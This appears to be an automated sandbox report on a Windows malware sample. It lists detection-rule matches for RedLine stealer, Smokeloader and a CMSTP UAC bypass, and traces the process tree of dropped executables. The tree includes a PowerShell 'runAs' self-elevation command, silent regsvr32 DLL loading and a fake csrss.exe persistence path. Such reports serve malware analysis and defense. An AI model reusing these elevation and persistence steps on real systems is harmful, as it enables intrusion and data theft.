                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: S23UhdW5DH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 16.2.93B.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 10.2.93B.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 27.0.356F.exe.fe0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: 00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000002B.00000002.2972702045.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.2411281547.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.2136667464.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2135693322.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000006.00000002.2414876922.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2410927648.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 0000002B.00000002.2973148017.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000008.00000002.2377117424.00000000023CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001E.00000002.2687018524.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000024.00000002.2584664956.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000001E.00000002.2686652141.0000000002B4F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
                Source: C:\Users\user\AppData\Local\Temp\356F.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: S23UhdW5DH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1199.dll.2.drStatic PE information: Section: .text IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 572.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 66E0.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rghwvve.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: csrss.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: _RegDLL.tmp.21.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: syncUpd[1].exe.31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: nsx5151.tmp.31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1199.dll.2.drStatic PE information: Section: nqb ZLIB complexity 0.9943938078703703
                Source: 1199.dll.2.drStatic PE information: Section: HIcf6ht ZLIB complexity 0.990925746681416
                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@81/130@831/100
                Source: C:\Users\user\AppData\Local\Temp\93B.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,17_2_00409448
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004555D0
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpCode function: 18_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,18_2_00455DF8
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeCode function: 0_2_005DF950 CreateToolhelp32Snapshot,Module32First,0_2_005DF950
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeCode function: 17_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,17_2_00409BEC
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rghwvveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeMutant created: \Sessions\1\BaseNamedObjects\jmuZVxzUSQKZJ
                Source: C:\ProgramData\Drivers\csrss.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3728:64:WilError_03
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FE8B.tmpJump to behavior
                Source: Yara matchFile source: 35.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000023.00000000.2524392182.0000000000401000.00000020.00000001.01000000.00000018.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                Source: S23UhdW5DH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\572.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\S23UhdW5DH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: S23UhdW5DH.exeReversingLabs: Detection: 44%
                Source: S23UhdW5DH.exeVirustotal: Detection: 52%
                Source: unknownProcess created: C:\Users\user\Desktop\S23UhdW5DH.exe C:\Users\user\Desktop\S23UhdW5DH.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\rghwvve C:\Users\user\AppData\Roaming\rghwvve
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FE8B.exe C:\Users\user\AppData\Local\Temp\FE8B.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exe
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93B.exe C:\Users\user\AppData\Local\Temp\93B.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\93B.exe "C:\Users\user\AppData\Local\Temp\93B.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1EB9.exe C:\Users\user\AppData\Local\Temp\1EB9.exe
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\Temp\1EB9.exe "C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\356F.exe C:\Users\user\AppData\Local\Temp\356F.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\nsx5151.tmp C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FE8B.exe C:\Users\user\AppData\Local\Temp\FE8B.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93B.exe C:\Users\user\AppData\Local\Temp\93B.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dllJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1EB9.exe C:\Users\user\AppData\Local\Temp\1EB9.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\356F.exe C:\Users\user\AppData\Local\Temp\356F.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\572.exeProcess created: C:\Users\user\AppData\Local\Temp\572.exe C:\Users\user\AppData\Local\Temp\572.exeJump to behavior
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\1199.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe"
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeProcess created: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp "C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                Source: C:\Users\user\AppData\Local\Temp\356F.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\nsx5151.tmp C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
